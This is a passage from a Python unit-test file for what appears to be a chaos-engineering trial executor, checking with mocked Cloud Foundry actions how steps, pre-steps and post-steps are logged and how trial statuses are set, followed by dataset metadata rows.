                mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
                TrialExecutor(self._trial, self.module_map,
                              {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 self.populated_step_get_app_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(app_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
            call('steps', 'Get org by name',
                 self.populated_step_get_org_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(org_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
        ])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')
        ])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_step_log),
            call(mock_trial_log)
        ])
        self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)

    def test_log_trial_without_param_interpolation(self):
        """Steps defined with concrete values (no placeholders) are logged
        with those same values unchanged."""
        step_get_app_by_name = {'step': 'Get CF App by Name',
                                'do': 'cf.get_app_by_name',
                                'where': {
                                    'cf_api_url': self.cf_api_url,
                                    'app_name': self.app_name}}
        step_get_org_by_name = {'step': 'Get CF Org by Name',
                                'do': 'cf.get_org_by_name',
                                'where': {
                                    'cf_api_url': self.cf_api_url,
                                    'org_name': self.org}}
        steps = [step_get_app_by_name, step_get_org_by_name]
        trial = create_experiment_and_trial({}, steps)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_cmd_mock, \
                mock.patch(self.CF_GET_ORG) as org_cmd_mock,\
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name', step_get_app_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(app_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
            call('steps', 'Get org by name', step_get_org_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(org_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
        ])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')
        ])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_step_log),
            call(mock_trial_log)
        ])
        self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)

    def test_interpolation_from_trial_definition(self):
        """Placeholders resolve from trial runtime parameters when the
        experiment itself defines no parameters."""
        parameters = {}
        trial = create_experiment_and_trial(
            parameters, self.steps, runtime_parameters=self.parameters)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_cmd_mock, \
                mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 self.populated_step_get_app_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(app_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
            call('steps', 'Get org by name',
                 self.populated_step_get_org_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(org_cmd_mock.return_value)),
            call().append('INFO', 'Completed.')])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_step_log),
            call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)

    def test_log_return_value_when_present(self):
        """A step's concrete return value is embedded in the result log."""
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_cmd_mock, \
                mock.patch(self.CF_GET_ORG) as org_cmd_mock, \
                TrialExecutor(self._trial, self.module_map, {}) \
                as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            # Give the actions concrete return values to appear in logs.
            app_cmd_mock.return_value = 'Hello World'
            org_cmd_mock.return_value = 'MY-ORG'
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 self.populated_step_get_app_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(app_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
            call('steps', 'Get org by name',
                 self.populated_step_get_org_by_name['where']),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(org_cmd_mock.return_value)),
            call().append('INFO', 'Completed.'),
        ])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')
        ])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_step_log),
            call(mock_trial_log)
        ])
        self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)

    def test_should_update_parameters(self):
        """After a run the trial's parameters match the experiment's."""
        with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
                TrialExecutor(self._trial, self.module_map,
                              {}) as trial_executor:
            trial_executor.run()
        self.assertEqual(self._trial.parameters, self.parameters)

    def test_log_success_if_expect_passes(self):
        """A passing 'expect' clause logs the expectation success line."""
        step_description = 'Get CF App by Name'
        expect_spec = [{'operator': 'eq', 'app_name': self.app_name}]
        steps = [{'step': step_description,
                  'do': 'cf.get_app_by_name',
                  'where': {'app_name': self.app_name,
                            'cf_api_url': self.cf_api_url},
                  'expect': expect_spec}]
        trial = create_experiment_and_trial({}, steps)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_cmd_mock, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            # Return value satisfies the eq expectation above.
            app_cmd_mock.return_value = {'app_name': self.app_name}
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 {'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          "Result: {}.".format(app_cmd_mock.return_value)),
            call().append('INFO',
                          "Succeeded. All expectations passed: {}.".format(
                              expect_spec)),
            call().append('INFO', 'Completed.'),
        ])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')
        ])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_log)
        ])
        self.assertEqual(trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioStepsFailed(TestTrialExecutor):
    """Scenarios where validation or execution fails: missing parameters
    mark the trial INVALID, runtime errors mark it FAILED, and the error
    details are appended to the trial-level result log."""

    def test_missing_param_in_steps(self):
        """A placeholder with no value anywhere ('cf_org') makes the
        trial INVALID before any step executes."""
        parameters = {}
        runtime_parameters = {'cf_api_url': self.cf_api_url,
                              'app_name': self.app_name}
        trial = create_experiment_and_trial(
            parameters, self.steps, runtime_parameters=runtime_parameters)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            trial_executor.run()
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          "Trial Invalid. Type: MissingParameterValueError. "
                          "Error: Trial is invalid because of missing value "
                          "in experiment parameters: 'cf_org'.")])
        mock_rec_commit.assert_has_calls([call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.INVALID.value)

    def test_missing_param_in_post_steps(self):
        """A missing value referenced only by a post-step also invalidates
        the trial up front."""
        parameters = {
            'cf_api_url': self.cf_api_url,
            'app_name': self.app_name}
        trial = create_experiment_and_trial(
            parameters, self.steps, post_steps=self.post_steps,
            runtime_parameters=self.parameters)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            trial_executor.run()
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          "Trial Invalid. Type: MissingParameterValueError. "
                          "Error: Trial is invalid because of missing value "
                          "in experiment parameters: 'health_endpoint'.")])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.INVALID.value)

    def test_abort_with_execution_failure(self):
        """An action exception aborts the trial after one attempt."""
        with mock.patch(self.CF_EXEC) as action_mock, \
                TrialExecutor(self._trial, self.module_map, {}) \
                as trial_executor:
            action_mock.side_effect = Exception("api function error.")
            trial_executor.run()
        action_mock.assert_called_once_with()
        self.assertEqual(self._trial.status, TrialStatus.FAILED.value)

    def test_update_executed_at(self):
        """executed_at is stamped even when the run fails."""
        with mock.patch(self.CF_EXEC) as action_mock, \
                TrialExecutor(self._trial, self.module_map, {})\
                as trial_executor:
            action_mock.side_effect = Exception("api function error.")
            trial_executor.run()
        self.assertIsInstance(self._trial.executed_at, timezone.datetime)

    def test_log_steps_with_param_interpolation(self):
        """A failing step logs its interpolated 'where' plus the error,
        and the trial log records a StepsExecutionError."""
        error_msg = "api function error."
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_EXEC) as action_mock, \
                TrialExecutor(self._trial, self.module_map, {})\
                as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            action_mock.side_effect = Exception(error_msg)
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 {'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
            call().append('INFO', 'Starting command execution.'),
            call().append('ERROR',
                          "Step failed. Type: Exception. "
                          "Error: api function error.")])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          'Trial Failed. Type: StepsExecutionError. '
                          'Error: [in: steps, reason: api function error.]')])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_log)])
        self.assertEqual(self._trial.status, TrialStatus.FAILED.value)

    def test_log_steps_without_param_interpolation_on_exec_fail(self):
        """Same failure logging when steps carry concrete values."""
        steps = [{'step': 'Get CF App by Name',
                  'do': 'cf.get_app_by_name',
                  'where': {
                      'cf_api_url': self.cf_api_url,
                      'app_name': self.app_name}},
                 {'step': 'Get CF Org by Name',
                  'do': 'cf.get_org_by_name',
                  'where': {
                      'cf_api_url': self.cf_api_url,
                      'org_name': self.org}}]
        trial = create_experiment_and_trial({}, steps)
        error_msg = "api function error."
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_EXEC) as action_mock, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            action_mock.side_effect = Exception(error_msg)
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 {'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
            call().append('INFO', 'Starting command execution.'),
            call().append('ERROR',
                          "Step failed. Type: Exception. "
                          "Error: api function error.")])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          'Trial Failed. Type: StepsExecutionError. '
                          'Error: [in: steps, reason: api function error.]')])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.FAILED.value)

    def test_log_with_invalid_param(self):
        """Malformed placeholder syntax surfaces as TemplateSyntaxError
        and fails the trial."""
        steps = [{'step': 'Get CF App by Name',
                  'do': 'cf.get_app_by_name',
                  'where': {
                      'app_name': '{{ app_name}',
                      'env': '{{my_environment }}',
                      'pool': '{{ my_pool }}'}}]
        trial = create_experiment_and_trial(
            self.parameters, steps)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            trial_executor.run()
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          'Trial Failed. Type: TemplateSyntaxError. '
                          'Error: unexpected \'}\'')])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.FAILED.value)

    def test_log_error_message_if_expect_fails(self):
        """An unmet 'expect' clause fails the step with FailedExpectation
        and the trial with StepsExecutionError."""
        steps = [{'step': 'Get CF App by Name',
                  'do': 'cf.get_app_by_name',
                  'where': {
                      'cf_api_url': self.cf_api_url,
                      'app_name': self.app_name},
                  'expect': [
                      {'operator': 'eq', 'app_name': 'unexpected-app-name'}]}]
        trial = create_experiment_and_trial({}, steps)
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_GET_APP) as app_mock, \
                TrialExecutor(trial, self.module_map, {}) as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_trial_step_log = mock.Mock()
            mock_trial_step_log.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_trial_step_log
            # Return value deliberately violates the expectation above.
            app_mock.return_value = {"app_name": "Hello World"}
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Get app by name',
                 {'app_name': self.app_name, 'cf_api_url': self.cf_api_url}),
            call().append('INFO', 'Starting command execution.'),
            call().append('ERROR',
                          "Step failed. Type: FailedExpectation. "
                          "Error: Expectation failed"
                          "(Hello World == unexpected-app-name)")])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('ERROR',
                          'Trial Failed. Type: StepsExecutionError. '
                          'Error: [in: steps, reason: Expectation failed'
                          '(Hello World == unexpected-app-name)]')])
        mock_rec_commit.assert_has_calls([
            call(mock_trial_step_log),
            call(mock_trial_log)])
        self.assertEqual(trial.status, TrialStatus.FAILED.value)
class TestTrialRunScenarioPostStepsSucceeded(TestTrialExecutor):
    """Scenario: the main step stops an app and the post-step restarts it;
    both succeed, so steps and post_steps are logged and the trial ends
    SUCCEEDED."""

    def setUp(self):
        """Replace the default steps with a stop-app step and a start-app
        post-step, then build the trial."""
        super(TestTrialRunScenarioPostStepsSucceeded, self).setUp()
        self.steps = [{'step': 'Stop App',
                       'do': 'cf.stop_app',
                       'where': {
                           'cf_api_url': self.cf_api_url,
                           'app_name': self.app_name}}]
        self.post_steps = [{'step': 'Start App',
                            'do': 'cf.start_app',
                            'where': {
                                'cf_api_url': self.cf_api_url,
                                'app_name': self.app_name}}]
        self.trial = create_experiment_and_trial(
            {}, self.steps, post_steps=self.post_steps)

    def test_post_steps_succeed(self):
        """Both phases appear in the step log ('steps' then 'post_steps')
        with their results, and the trial completes successfully."""
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_STOP_APP) as stop_app_action, \
                mock.patch(self.CF_START_APP) as start_app_action, \
                TrialExecutor(self.trial, self.module_map, {})\
                as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_log_record = mock.Mock()
            mock_log_record.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_log_record
            start_app_action.return_value = 'start_app'
            stop_app_action.return_value = 'stop_app'
            trial_executor.run()
        mock_step_rec_cls.assert_has_calls([
            call('steps', 'Stop app',
                 {'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          'Result: {}.'.format(stop_app_action.return_value)),
            call().append('INFO', 'Completed.'),
            call('post_steps', 'Start app',
                 {'cf_api_url': self.cf_api_url, 'app_name': 'hello-world'}),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          'Result: {}.'.format(start_app_action.return_value)),
            call().append('INFO', 'Completed.')])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')])
        mock_rec_commit.assert_has_calls([call(mock_trial_log)])
        self.assertEqual(self.trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioPostStepsFailed(TestTrialExecutor):
    """Scenario: the stop-app step succeeds but the start-app post-step
    raises; the trial must be marked FAILED with the post_steps error."""

    def setUp(self):
        """Use a stop-app step plus a start-app post-step for the trial."""
        super(TestTrialRunScenarioPostStepsFailed, self).setUp()
        stop_step = {'step': 'Stop App',
                     'do': 'cf.stop_app',
                     'where': {'cf_api_url': self.cf_api_url,
                               'app_name': self.app_name}}
        start_step = {'step': 'Start App',
                      'do': 'cf.start_app',
                      'where': {'cf_api_url': self.cf_api_url,
                                'app_name': self.app_name}}
        self.steps = [stop_step]
        self.post_steps = [start_step]
        self.trial = create_experiment_and_trial(
            {}, self.steps, post_steps=self.post_steps)

    def test_post_steps_fail(self):
        """A post-step exception yields a StepsExecutionError pointing at
        'post_steps' and a FAILED trial status."""
        with mock.patch(self.LOG_REC) as log_record_cls, \
                mock.patch(self.COMMIT) as commit_mock, \
                mock.patch(self.CF_STOP_APP), \
                mock.patch(self.CF_START_APP) as start_action, \
                TrialExecutor(self.trial, self.module_map, {}) \
                as trial_executor:
            trial_log = mock.Mock()
            trial_log.append = mock.Mock()
            log_record_cls.return_value = trial_log
            start_action.side_effect = Exception("Api error message")
            trial_executor.run()
        log_record_cls.assert_called_with('result')
        trial_log.append.assert_called_with(
            'ERROR', 'Trial Failed. Type: StepsExecutionError. '
                     'Error: [in: post_steps, reason: Api error message]')
        commit_mock.assert_has_calls([call(trial_log)])
        self.assertEqual(self.trial.status, TrialStatus.FAILED.value)
class TestTrialRunScenarioPreStepsSucceeded(TestTrialExecutor):
    """Scenario: a trial with 'pre_steps' and 'steps' that all succeed."""

    def setUp(self):
        super(TestTrialRunScenarioPreStepsSucceeded, self).setUp()
        # pre_steps stop the app before the experiment's main steps run.
        self.pre_steps = [{'step': 'Stop App',
                           'do': 'cf.stop_app',
                           'where': {
                               'cf_api_url': self.cf_api_url,
                               'app_name': self.app_name}}]
        self.steps = [{'step': 'Start App',
                       'do': 'cf.start_app',
                       'where': {
                           'cf_api_url': self.cf_api_url,
                           'app_name': self.app_name}}]
        self.trial = create_experiment_and_trial(
            {}, self.steps, pre_steps=self.pre_steps)

    def test_pre_steps_and_steps_succeed(self):
        """pre_steps are executed and logged before steps; trial SUCCEEDED."""
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.STEP_REC) as mock_step_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_STOP_APP) as stop_app_action, \
                mock.patch(self.CF_START_APP) as start_app_action, \
                TrialExecutor(self.trial, self.module_map, {}) \
                as trial_executor:
            # Trial-level and per-step log records returned by the patched
            # record classes.
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            mock_log_record = mock.Mock()
            mock_log_record.append = mock.Mock()
            mock_step_rec_cls.return_value = mock_log_record
            # Canned action results echoed into the step logs.
            start_app_action.return_value = 'start_app'
            stop_app_action.return_value = 'stop_app'
            trial_executor.run()
        # Assertions after the 'with': the mocks keep their recorded calls
        # after unpatching, and the executor has fully exited.
        # 'pre_steps' (Stop app) must be recorded before 'steps' (Start app).
        mock_step_rec_cls.assert_has_calls([
            call('pre_steps', 'Stop app',
                 {'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          'Result: {}.'.format(stop_app_action.return_value)),
            call().append('INFO', 'Completed.'),
            call('steps', 'Start app',
                 {'cf_api_url': self.cf_api_url, 'app_name': self.app_name}),
            call().append('INFO', 'Starting command execution.'),
            call().append('INFO',
                          'Result: {}.'.format(start_app_action.return_value)),
            call().append('INFO', 'Completed.')])
        mock_log_rec_cls.assert_has_calls([
            call('result'),
            call().append('INFO', 'Trial Completed.')])
        # The trial log must have been committed.
        mock_rec_commit.assert_has_calls([
            call(mock_trial_log)])
        self.assertEqual(self.trial.status, TrialStatus.SUCCEEDED.value)
class TestTrialRunScenarioPreStepsFailed(TestTrialExecutor):
    """Scenario: a failing pre_step aborts the trial before its main steps."""

    def setUp(self):
        super(TestTrialRunScenarioPreStepsFailed, self).setUp()
        target = {'cf_api_url': self.cf_api_url, 'app_name': self.app_name}
        self.pre_steps = [{'step': 'Stop App', 'do': 'cf.stop_app',
                           'where': dict(target)}]
        self.steps = [{'step': 'Start App', 'do': 'cf.start_app',
                       'where': dict(target)}]
        self.trial = create_experiment_and_trial(
            {}, self.steps, pre_steps=self.pre_steps)

    def test_pre_steps_fail(self):
        """An exception in pre_steps yields status ABORTED and an ERROR log."""
        with mock.patch(self.LOG_REC) as log_record_cls, \
                mock.patch(self.COMMIT) as record_commit, \
                mock.patch(self.CF_STOP_APP) as stop_app, \
                mock.patch(self.CF_START_APP), \
                TrialExecutor(self.trial, self.module_map, {}) \
                as executor:
            # Only the pre_steps action (stop_app) blows up.
            stop_app.side_effect = Exception("Api error message")
            trial_log = mock.Mock()
            trial_log.append = mock.Mock()
            log_record_cls.return_value = trial_log
            executor.run()
        log_record_cls.assert_called_with('result')
        trial_log.append.assert_called_with(
            'ERROR',
            "Trial Aborted. Type: StepsExecutionError. "
            "Error: [in: pre_steps, reason: Api error message]")
        record_commit.assert_has_calls([call(trial_log)])
        self.assertEqual(self.trial.status, TrialStatus.ABORTED.value)
class TestTrialRunOnExit(TestTrialExecutor):
    """Attached observers are notified exactly once when the executor exits,
    regardless of whether the trial succeeded or failed."""

    def setUp(self):
        super(TestTrialRunOnExit, self).setUp()
        self.observer_mock = mock.Mock(spec=Observer)

    def test_notify_attached_observers_on_trial_success(self):
        """A successful run ends with a single observer update."""
        with mock.patch(self.CF_GET_APP), mock.patch(self.CF_GET_ORG), \
                TrialExecutor(self._trial, self.module_map, {}) as executor:
            executor.attach(self.observer_mock)
            executor.run()
        self.observer_mock.update.assert_called_once_with(trial=self._trial)

    def test_notify_attached_observers_on_trial_fail(self):
        """A failing action does not suppress the observer notification."""
        with mock.patch(self.CF_GET_APP) as get_app, \
                mock.patch(self.CF_GET_ORG), \
                TrialExecutor(self._trial, self.module_map, {}) \
                as executor:
            get_app.side_effect = Exception("Api error message")
            executor.attach(self.observer_mock)
            executor.run()
        self.observer_mock.update.assert_called_once_with(trial=self._trial)
class TestTrialRunOnStopped(TestTrialExecutor):
    """Behavior of a run when a stop is requested (STOP_INITIATED)."""

    def setUp(self):
        super(TestTrialRunOnStopped, self).setUp()
        # Captures the status passed to trial.update_status by the executor.
        self.updated_status = None

    def test_stopped_status(self):
        """A trial already in STOP_INITIATED is transitioned to STOPPED."""
        with mock.patch(self.LOG_REC) as mock_log_rec_cls, \
                mock.patch(self.COMMIT) as mock_rec_commit, \
                mock.patch(self.CF_STOP_APP), \
                mock.patch(self.CF_START_APP), \
                TrialExecutor(self._trial, self.module_map, {}) \
                as trial_executor:
            mock_trial_log = mock.Mock()
            mock_trial_log.append = mock.Mock()
            mock_log_rec_cls.return_value = mock_trial_log
            # Put the trial into STOP_INITIATED before running, then replace
            # update_status so we can observe the status the executor sets.
            self._trial.update_status(TrialStatus.STOP_INITIATED)

            def update_status_mock_func(arg):
                self.updated_status = arg

            update_status_mock = mock.Mock()
            update_status_mock.side_effect = update_status_mock_func
            self._trial.update_status = update_status_mock
            trial_executor.run()
        mock_log_rec_cls.assert_called_with('result')
        mock_rec_commit.assert_has_calls([call(mock_trial_log)])
        self.assertEqual(self.updated_status, TrialStatus.STOPPED)

    def test_not_stopped_in_post_steps(self):
        """A stop requested during post_steps does not stop the trial.

        The executor's internal _execute_action is replaced so that the stop
        request is raised exactly when the 'start_app' action (a post_step)
        runs; the trial must still finish as SUCCEEDED.
        """
        with mock.patch(self.LOG_REC), \
                mock.patch(self.COMMIT), \
                mock.patch(self.CF_STOP_APP), \
                mock.patch(self.CF_START_APP), \
                TrialExecutor(self._trial, self.module_map, {}) \
                as trial_executor:
            # arg1 is the action being executed; request a stop only when the
            # post_steps action ('start_app') is reached.
            def update_status_if_start_app(arg1, arg2):
                if arg1.get_function_name() == 'start_app':
                    self._trial.update_status(TrialStatus.STOP_INITIATED)

            execute_action_mock = mock.Mock()
            execute_action_mock.side_effect = update_status_if_start_app
            trial_executor._execute_action = execute_action_mock
            trial_executor.run()
        self.assertEqual(self._trial.status, TrialStatus.SUCCEEDED.value)
class TestExecuteTrial(TestCase):
    """execute_trial builds a TrialExecutor from the settings-derived maps
    and drives it as a context manager (__enter__, run, __exit__)."""

    @mock.patch("kallisticore.lib.trial_executor.TrialExecutor", autospec=True)
    def test_trial_executor_invoked(self, mock_trial_executor):
        mock_object = self.create_mock_trial_executor(mock_trial_executor)
        trial = {}
        execute_trial(trial)
        self.assert_executor_called(mock_object, mock_trial_executor, trial)

    def assert_executor_called(self, mock_object, mock_trial_executor, trial):
        """Verify construction arguments and the context-manager lifecycle."""
        module_map = getattr(settings, 'KALLISTI_MODULE_MAP', {})
        cred_cls_map = getattr(settings, 'KALLISTI_CREDENTIAL_CLASS_MAP', {})
        mock_trial_executor.assert_called_once_with(trial, module_map,
                                                    cred_cls_map)
        # Bug fix: the original asserted __enter__ twice (copy-paste
        # duplicate); each lifecycle hook is checked exactly once.
        mock_object.__enter__.assert_called_once()
        mock_object.run.assert_called_once()
        mock_object.__exit__.assert_called_once()

    def create_mock_trial_executor(self, mock_trial_executor):
        """Return a mock usable as a context manager yielding itself."""
        mock_object = Mock()
        mock_object.__enter__ = Mock(return_value=mock_object)
        mock_object.__exit__ = Mock()
        mock_trial_executor.return_value = mock_object
        return mock_object
| 45.662584
| 79
| 0.591928
| 4,810
| 41,005
| 4.670686
| 0.045738
| 0.041307
| 0.048607
| 0.027775
| 0.828852
| 0.786121
| 0.769518
| 0.750512
| 0.736135
| 0.729636
| 0
| 0.000139
| 0.298793
| 41,005
| 897
| 80
| 45.713489
| 0.781205
| 0
| 0
| 0.73125
| 0
| 0
| 0.12479
| 0.013828
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.05125
| false
| 0.0025
| 0.01625
| 0
| 0.095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7a55f0c3a06db6d43523d2d9069d00fa02402ad
| 210
|
py
|
Python
|
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
|
94b8c5b9f8b12423393c68f7d9f910258840ed18
|
[
"BSD-3-Clause"
] | null | null | null |
foxylib/tools/messenger/slack/methods/response_tool.py
|
foxytrixy-com/foxylib
